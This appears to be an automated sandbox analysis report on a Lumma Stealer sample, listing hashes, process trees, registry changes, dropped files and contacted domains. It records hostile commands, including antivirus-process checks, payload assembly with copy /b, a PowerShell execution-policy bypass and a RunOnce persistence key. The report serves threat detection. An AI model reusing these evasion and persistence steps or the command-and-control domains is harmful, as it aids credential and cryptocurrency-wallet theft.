Malware Analysis Report

2024-12-07 13:04

Sample ID 241113-ybsp1s1pdk
Target AccessoryLiberty.zip
SHA256 b80c11df84d7873d503f4961a305ffe8ea74ce65d411273183939d3c446cb5f8
Tags
lumma discovery persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b80c11df84d7873d503f4961a305ffe8ea74ce65d411273183939d3c446cb5f8

Threat Level: Known bad

The file AccessoryLiberty.zip was found to be: Known bad.

Malicious Activity Summary

lumma discovery persistence spyware stealer

Lumma family

Lumma Stealer, LummaC

Blocklisted process makes network request

Downloads MZ/PE file

Checks computer location settings

Reads user/profile data of web browsers

Uses the VBS compiler for execution

Executes dropped EXE

Loads dropped DLL

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of SetThreadContext

Enumerates processes with tasklist

Drops file in Windows directory

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Browser Information Discovery

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 19:37

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 19:37

Reported

2024-11-13 19:39

Platform

win7-20240903-en

Max time kernel

117s

Max time network

117s

Command Line

"C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe"

Signatures

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OSXTOC.pif N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A

Reads user/profile data of web browsers

spyware stealer

Uses the VBS compiler for execution

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\dbabech = "\"C:\\ehfecbk\\AutoIt3.exe\" C:\\ehfecbk\\dbabech.a3x" C:\Users\Admin\AppData\Roaming\OSXTOC.pif N/A

Checks installed software on the system

discovery

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2944 set thread context of 1864 N/A C:\Users\Admin\AppData\Roaming\OSXTOC.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\PharmaciesLowest C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe N/A
File opened for modification C:\Windows\CouncilsStatement C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\OSXTOC.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Roaming\OSXTOC.pif N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\OSXTOC.pif N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2460 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe C:\Windows\SysWOW64\cmd.exe
PID 2460 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe C:\Windows\SysWOW64\cmd.exe
PID 2460 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe C:\Windows\SysWOW64\cmd.exe
PID 2460 wrote to memory of 3012 N/A C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 1128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3012 wrote to memory of 1128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3012 wrote to memory of 1128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3012 wrote to memory of 1128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3012 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3012 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3012 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3012 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3012 wrote to memory of 2084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3012 wrote to memory of 2084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3012 wrote to memory of 2084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3012 wrote to memory of 2084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 3012 wrote to memory of 1780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3012 wrote to memory of 1780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3012 wrote to memory of 1780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3012 wrote to memory of 1780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3012 wrote to memory of 1696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 1696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 1696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 1696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 1228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3012 wrote to memory of 1228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3012 wrote to memory of 1228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3012 wrote to memory of 1228 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3012 wrote to memory of 2996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3012 wrote to memory of 2640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\208231\War.pif
PID 3012 wrote to memory of 2640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\208231\War.pif
PID 3012 wrote to memory of 2640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\208231\War.pif
PID 3012 wrote to memory of 2640 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\208231\War.pif
PID 3012 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 3012 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 3012 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 3012 wrote to memory of 1672 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\choice.exe
PID 2640 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2640 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif C:\Users\Admin\AppData\Roaming\OSXTOC.pif
PID 2640 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif C:\Users\Admin\AppData\Roaming\OSXTOC.pif
PID 2640 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif C:\Users\Admin\AppData\Roaming\OSXTOC.pif
PID 2640 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif C:\Users\Admin\AppData\Roaming\OSXTOC.pif
PID 2944 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Roaming\OSXTOC.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2944 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Roaming\OSXTOC.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2944 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Roaming\OSXTOC.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2944 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Roaming\OSXTOC.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2944 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Roaming\OSXTOC.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 2944 wrote to memory of 1864 N/A C:\Users\Admin\AppData\Roaming\OSXTOC.pif C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe

"C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Coordination Coordination.bat & Coordination.bat

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 208231

C:\Windows\SysWOW64\findstr.exe

findstr /V "pantiescurverefrigeratorcapital" Portfolio

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Canada + ..\Dv + ..\Admissions + ..\Strand + ..\Boring + ..\Synthetic + ..\Evaluation O

C:\Users\Admin\AppData\Local\Temp\208231\War.pif

War.pif O

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -exec bypass -f "C:\Users\Admin\AppData\Local\Temp\8DM73Q6MILY9OMG2FF0EK1936BFOZYX.ps1"

C:\Users\Admin\AppData\Roaming\OSXTOC.pif

"C:\Users\Admin\AppData\Roaming\OSXTOC.pif" "C:\Users\Admin\AppData\Roaming\D4LFFM.pptm"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 fiuflJZlSGqtte.fiuflJZlSGqtte udp
US 8.8.8.8:53 toleratedbaybo.cyou udp
US 172.67.140.112:443 toleratedbaybo.cyou tcp
US 172.67.140.112:443 toleratedbaybo.cyou tcp
US 172.67.140.112:443 toleratedbaybo.cyou tcp
US 172.67.140.112:443 toleratedbaybo.cyou tcp
US 172.67.140.112:443 toleratedbaybo.cyou tcp
US 8.8.8.8:53 cdn1.pixel-story.shop udp
US 104.21.32.85:443 cdn1.pixel-story.shop tcp
US 8.8.8.8:53 pixelpalette.shop udp
US 104.21.84.104:443 pixelpalette.shop tcp

Files

C:\Users\Admin\AppData\Local\Temp\Coordination

MD5 485f89cfaf1420f132a95a0b7c6e6305
SHA1 efb827df52282fb79b5f44ec9e63b8e5a47c37e1
SHA256 eea03a384671dd1323b8d853ed49df8a27dbc2a706400437bd8d48e6076453bd
SHA512 116c823265a05c4b338e94204ce48267f112d12e55a8473fc05426af0a476c37fc272408eb805d117f6e8cab059fbd708c6158bd041ff3e9a8a430a577cc669b

C:\Users\Admin\AppData\Local\Temp\Portfolio

MD5 4d06e14fe2951aa0024c22936e5f531b
SHA1 c718b677b65d246033898069459f078a00f650be
SHA256 0e3ab81f015e71af9b43ed7fd5854c3560c6ce09443b0cbffb0ac6c10d93d918
SHA512 5bf78bc3bfce3553dff1e80ec3fef4c2589e618b1a3ac2723ed89a24c5fdd78b5e80f2bc778346f21b2c5f9750c00ea7a5ba9b3bd42f9f9f804ef838b92c887c

C:\Users\Admin\AppData\Local\Temp\Shoppers

MD5 52620731f9486725cceaf71e1a45cc9f
SHA1 0d166e1027ae7903dced0abe3570f71516fc5baf
SHA256 73e5301ad4b4aea78e34de20b8088641fc1d04b1444ed4ecbc6da47603d87cc2
SHA512 b4546af693050332c0477dd38b5e816ac2fe490d550ae296ef759714c33c96a648e4ed96294b777392bbfaf6fba876460f78c5730ecc61ef801f45cdb298dc36

C:\Users\Admin\AppData\Local\Temp\Canada

MD5 d426ef537d4e36651d372eb67de61c71
SHA1 c00ecae6e973056c698680c714bd8c932df53c56
SHA256 f0919fbdae23b005eb403344118d8509a316037ae5460484d81d8452a74812e3
SHA512 d042b71e1badef416e42f8c1235163ed7a71ae5d3cd897aca1dbb2b344769428b37e71e7b9b1a6c0ffbfdab8222eff893fc28415389b5afdcd262bd7eb7a40d6

C:\Users\Admin\AppData\Local\Temp\Dv

MD5 367fecb6d4d73f3e22e2186fbe91f216
SHA1 2bce21a05dfeee536cda999fbaa73c1af28b9d86
SHA256 11741c20239ea1dd1c392abda3ee226e16ad2fd004f8fe344d2d068c8e20ef62
SHA512 09009011345cc71715ba9ff975d0d304d3160090281a3c9672187b2f2c3eeab3653c31849f1306ae3d77459e0de8f63ce2037c0d330c16c361491d32b089b315

C:\Users\Admin\AppData\Local\Temp\Admissions

MD5 b9675af1aafe9bbc3397bb840117840a
SHA1 e0fae0f4ef594f472216025e838fadbb2aa0b861
SHA256 875276f91f4aa27b3d23da12c88e94871fe7ed6401ec8f4657b4f6be2f33a01d
SHA512 70a24225488d1e41f36244d7811766e2379b8c90ea57d1fb5d33b54e2f62e032002a7c2e45aeb8f47e45840a6cc16cfed5680f88e71de68b3a15af73db24a5e6

C:\Users\Admin\AppData\Local\Temp\Evaluation

MD5 9c1eec6ad97d3430478939c6df01ea8a
SHA1 be6e6c3fbb3fb22e34d7b5bc2c1a2d996bb4e81e
SHA256 fbc43c30a07c44894f7870d666d3e370f4d5f77695d5fa727597884c1495fc9b
SHA512 2f4923eccd70a2790b6a6e4876f91aa9fd87b7e767abac3e48084b14de21a7beccf471eca35b9df1069e67ed18407916213ff7b52b129fe252c7169b2081bad6

C:\Users\Admin\AppData\Local\Temp\Synthetic

MD5 c0391116646bfea7d85bb681a33e3ba0
SHA1 9996422133ed60d69b923b118949183e8758e0a3
SHA256 5791d23d4c78f0e17d98eee9e51ebf24ea678fdf9b059bfb5dcf19c16dcba85a
SHA512 3e6a4e31ad6161fa617aa116378d9817390a031e640a157cdda299e8d0dddc4e27517ff53ed56081c0c34b348be627b6a5ab6f1c1ae9192f34a446ba19b23f47

C:\Users\Admin\AppData\Local\Temp\Boring

MD5 10e29c8822f7da216b45a11d3ee0eda8
SHA1 23e62cb3f04cd00b22fe54a65e3b81518c78e614
SHA256 4a4f9151f243bd1eca82a0721bae4136e37c3835324991516c62fc70f99dcb05
SHA512 c0a2772c8ae6c4b450f38327c8386f526ffff7f3bec3bf6e495a2a01b465da64de4d815e51961f37cb43239b05d3fd53a01fb4b33cd0fa67a84680bc24ffe572

C:\Users\Admin\AppData\Local\Temp\Strand

MD5 cd7bd19edb3ded5365bab0e5956309db
SHA1 1e0d4ba49a9592faebcfa4119f523ca7735108bb
SHA256 84078ab15033945d702802a013fbc3142b56db1371ff79ba1107df211300d803
SHA512 574476aaf140810d1cfd9a99187097d68c024c89c57f82a2399e2933f46e854989364759e35474048eaad35b817c63d05e19ed75393ec893bbaf57f7061d96e4

\Users\Admin\AppData\Local\Temp\208231\War.pif

MD5 78ba0653a340bac5ff152b21a83626cc
SHA1 b12da9cb5d024555405040e65ad89d16ae749502
SHA256 05d8cf394190f3a707abfb25fb44d7da9d5f533d7d2063b23c00cc11253c8be7
SHA512 efb75e4c1e0057ffb47613fd5aae8ce3912b1558a4b74dbf5284c942eac78ecd9aca98f7c1e0e96ec38e8177e58ffdf54f2eb0385e73eef39e8a2ce611237317

C:\Users\Admin\AppData\Local\Temp\208231\O

MD5 36464052c5bab6fbe9375ae0c39f051a
SHA1 cd35ee319164eb8a73bc8b5f86fea33b7227ae64
SHA256 d0b9c83c8bddbe2d9e18b0e8c5e3abcdb3bac5a9f6f3058fc3bcb8d3fde78ced
SHA512 01a7c98f1fa174dfc72360372b01e641a432e5b429ac3a366a9648f42e1776e9cfd5f9834173a8483fc470b1ec7fcadde7a7f639e07f08dadf460f5b46e9cb59

memory/2640-556-0x0000000003890000-0x00000000038E7000-memory.dmp

memory/2640-558-0x0000000003890000-0x00000000038E7000-memory.dmp

memory/2640-560-0x0000000003890000-0x00000000038E7000-memory.dmp

memory/2640-559-0x0000000003890000-0x00000000038E7000-memory.dmp

memory/2640-557-0x0000000003890000-0x00000000038E7000-memory.dmp

memory/2640-555-0x0000000003890000-0x00000000038E7000-memory.dmp

memory/2640-568-0x0000000002580000-0x00000000025B9000-memory.dmp

memory/2640-569-0x0000000002580000-0x00000000025B9000-memory.dmp

memory/2640-567-0x0000000003890000-0x00000000038E7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8DM73Q6MILY9OMG2FF0EK1936BFOZYX.ps1

MD5 a93ef812fcdf3af24ff8b33a75d4992e
SHA1 b282892bd321a8709474f43d790d7e661edaa98f
SHA256 d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6
SHA512 272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037

\Users\Admin\AppData\Roaming\OSXTOC.pif

MD5 3f58a517f1f4796225137e7659ad2adb
SHA1 e264ba0e9987b0ad0812e5dd4dd3075531cfe269
SHA256 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48
SHA512 acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634

C:\Users\Admin\AppData\Roaming\D4LFFM.pptm

MD5 3c6d0866e54ab391bc09713fde4c9d38
SHA1 a1a4e9c067e3c85739e85fb45f7ecdb363bcf856
SHA256 ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682
SHA512 eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4

memory/1864-586-0x0000000000400000-0x00000000009BA000-memory.dmp

memory/1864-587-0x0000000000400000-0x00000000009BA000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 19:37

Reported

2024-11-13 19:39

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe"

Signatures

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A
N/A N/A C:\Users\Admin\AppData\Roaming\0VYTBW.pif N/A

Reads user/profile data of web browsers

spyware stealer

Uses the VBS compiler for execution

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\dbabech = "\"C:\\ehfecbk\\AutoIt3.exe\" C:\\ehfecbk\\dbabech.a3x" C:\Users\Admin\AppData\Roaming\0VYTBW.pif N/A

Checks installed software on the system

discovery

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\CouncilsStatement C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe N/A
File opened for modification C:\Windows\PharmaciesLowest C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\choice.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\0VYTBW.pif N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Roaming\0VYTBW.pif N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\0VYTBW.pif N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\208231\War.pif N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3088 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe C:\Windows\SysWOW64\cmd.exe
PID 3088 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe C:\Windows\SysWOW64\cmd.exe
PID 3088 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\AccessoryLiberty.exe C:\Windows\SysWOW64\cmd.exe
PID 1496 wrote to memory of 2300 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1496 wrote to memory of 2300 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1496 wrote to memory of 2300 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
